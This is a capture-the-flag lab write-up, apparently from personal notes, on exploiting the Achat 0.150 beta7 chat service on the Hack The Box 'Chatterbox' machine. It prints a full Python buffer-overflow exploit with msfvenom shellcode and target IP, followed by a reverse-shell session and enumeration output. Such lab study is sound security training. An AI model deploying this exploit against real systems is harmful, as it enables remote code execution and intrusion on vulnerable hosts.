Remote Buffer Overflow

Achat version 0.150 beta7 suffers from a remote buffer overflow vulnerability Although I was unable to enumerate the version information on the target application, multiple sources revealed that the Achat application is vulnerable without a mention of version information.

Exploit

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
 
import socket
import sys, time
 
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
 
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x49\x6c\x79\x58\x75\x32\x49\x70"
buf += b"\x4d\x30\x4d\x30\x33\x30\x33\x59\x49\x55\x30\x31"
buf += b"\x35\x70\x51\x54\x32\x6b\x70\x50\x4c\x70\x74\x4b"
buf += b"\x31\x42\x5a\x6c\x52\x6b\x61\x42\x6e\x34\x62\x6b"
buf += b"\x62\x52\x6e\x48\x5a\x6f\x34\x77\x6e\x6a\x4d\x56"
buf += b"\x6d\x61\x59\x6f\x74\x6c\x4f\x4c\x63\x31\x73\x4c"
buf += b"\x6c\x42\x4e\x4c\x4f\x30\x59\x31\x78\x4f\x6c\x4d"
buf += b"\x69\x71\x77\x57\x48\x62\x69\x62\x31\x42\x70\x57"
buf += b"\x34\x4b\x6f\x62\x4c\x50\x64\x4b\x4e\x6a\x4d\x6c"
buf += b"\x54\x4b\x4e\x6c\x6a\x71\x33\x48\x49\x53\x6d\x78"
buf += b"\x6b\x51\x4a\x31\x50\x51\x74\x4b\x61\x49\x4b\x70"
buf += b"\x59\x71\x39\x43\x72\x6b\x70\x49\x4c\x58\x58\x63"
buf += b"\x6d\x6a\x71\x39\x64\x4b\x4f\x44\x62\x6b\x4b\x51"
buf += b"\x66\x76\x4e\x51\x49\x6f\x54\x6c\x79\x31\x76\x6f"
buf += b"\x6c\x4d\x7a\x61\x59\x37\x4f\x48\x77\x70\x73\x45"
buf += b"\x6c\x36\x39\x73\x33\x4d\x48\x78\x6f\x4b\x33\x4d"
buf += b"\x4d\x54\x42\x55\x38\x64\x51\x48\x32\x6b\x71\x48"
buf += b"\x6d\x54\x39\x71\x36\x73\x70\x66\x32\x6b\x7a\x6c"
buf += b"\x30\x4b\x54\x4b\x4e\x78\x6d\x4c\x39\x71\x69\x43"
buf += b"\x52\x6b\x5a\x64\x44\x4b\x49\x71\x56\x70\x52\x69"
buf += b"\x70\x44\x6f\x34\x6e\x44\x6f\x6b\x71\x4b\x31\x51"
buf += b"\x6f\x69\x50\x5a\x70\x51\x69\x6f\x37\x70\x31\x4f"
buf += b"\x31\x4f\x30\x5a\x32\x6b\x4c\x52\x6a\x4b\x52\x6d"
buf += b"\x31\x4d\x43\x38\x6c\x73\x4e\x52\x4b\x50\x6d\x30"
buf += b"\x42\x48\x64\x37\x54\x33\x4d\x62\x4f\x6f\x51\x44"
buf += b"\x33\x38\x30\x4c\x33\x47\x6e\x46\x7a\x67\x39\x6f"
buf += b"\x6a\x35\x68\x38\x42\x70\x6b\x51\x69\x70\x4d\x30"
buf += b"\x6c\x69\x57\x54\x61\x44\x50\x50\x43\x38\x6d\x59"
buf += b"\x31\x70\x30\x6b\x39\x70\x69\x6f\x46\x75\x42\x30"
buf += b"\x6e\x70\x32\x30\x32\x30\x31\x30\x30\x50\x71\x30"
buf += b"\x4e\x70\x70\x68\x6a\x4a\x4a\x6f\x47\x6f\x39\x50"
buf += b"\x79\x6f\x59\x45\x63\x67\x42\x4a\x79\x75\x6f\x78"
buf += b"\x59\x7a\x5a\x6a\x6a\x6e\x6b\x5a\x50\x68\x4c\x42"
buf += b"\x6b\x50\x6b\x77\x7a\x6f\x55\x39\x67\x76\x30\x6a"
buf += b"\x4e\x30\x4e\x76\x71\x47\x73\x38\x63\x69\x64\x65"
buf += b"\x32\x54\x70\x61\x69\x6f\x76\x75\x35\x35\x45\x70"
buf += b"\x53\x44\x4c\x4c\x79\x6f\x6e\x6e\x6c\x48\x50\x75"
buf += b"\x38\x6c\x73\x38\x4a\x50\x65\x65\x44\x62\x30\x56"
buf += b"\x69\x6f\x78\x55\x53\x38\x62\x43\x72\x4d\x32\x44"
buf += b"\x4b\x50\x44\x49\x77\x73\x6e\x77\x51\x47\x71\x47"
buf += b"\x4d\x61\x48\x76\x6f\x7a\x4e\x32\x62\x39\x51\x46"
buf += b"\x37\x72\x69\x6d\x4f\x76\x57\x57\x70\x44\x6e\x44"
buf += b"\x6f\x4c\x6d\x31\x4d\x31\x74\x4d\x6f\x54\x6c\x64"
buf += b"\x4a\x70\x76\x66\x59\x70\x4f\x54\x52\x34\x72\x30"
buf += b"\x30\x56\x6f\x66\x50\x56\x70\x46\x30\x56\x30\x4e"
buf += b"\x50\x56\x30\x56\x30\x53\x51\x46\x53\x38\x62\x59"
buf += b"\x58\x4c\x4d\x6f\x53\x56\x69\x6f\x78\x55\x43\x59"
buf += b"\x77\x70\x50\x4e\x31\x46\x31\x36\x49\x6f\x50\x30"
buf += b"\x71\x58\x6a\x68\x54\x47\x4b\x6d\x71\x50\x49\x6f"
buf += b"\x39\x45\x77\x4b\x4a\x50\x57\x45\x55\x52\x62\x36"
buf += b"\x52\x48\x56\x46\x44\x55\x47\x4d\x63\x6d\x4b\x4f"
buf += b"\x49\x45\x6d\x6c\x7a\x66\x63\x4c\x4b\x5a\x75\x30"
buf += b"\x69\x6b\x47\x70\x50\x75\x6a\x65\x37\x4b\x30\x47"
buf += b"\x4c\x53\x71\x62\x70\x6f\x52\x4a\x59\x70\x6f\x63"
buf += b"\x4b\x4f\x76\x75\x41\x41"
 
 
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
 
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
 
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

This is the Python script that performs the remote buffer overflow on Achat version 0.150 beta7 As shown, the exploit was confirmed to be working against a Windows 7 host, which matches the target system

It was originally just a PoC as the payload is from MSFVenom that launches the calculator upon exploitation.

However, I appended a custom payload to it

I also changed the value of theserver_address variable to match the target IP

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ python2 36025.py           
---->{P00F}!

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ nnc 9999                        
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.74] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32> whoami
 whoami
chatterbox\alfred
 
c:\Windows\system32> hostname
 hostname
Chatterbox
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 4:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.74
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{111d2ff5-ef2c-4d77-b44c-dbce3aaabf4b}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Initial Foothold established to the target system as the alfred user via remote buffer overflow on the target Achat instance

This was a spray-n-pray but still confirmed that it was running the version 0.150 bete7

InfoSec LAB

Explorer

Chatterbox_Exploitation

Remote Buffer Overflow

Exploit

Exploitation

Interactive Graph View

Table of Contents

Backlinks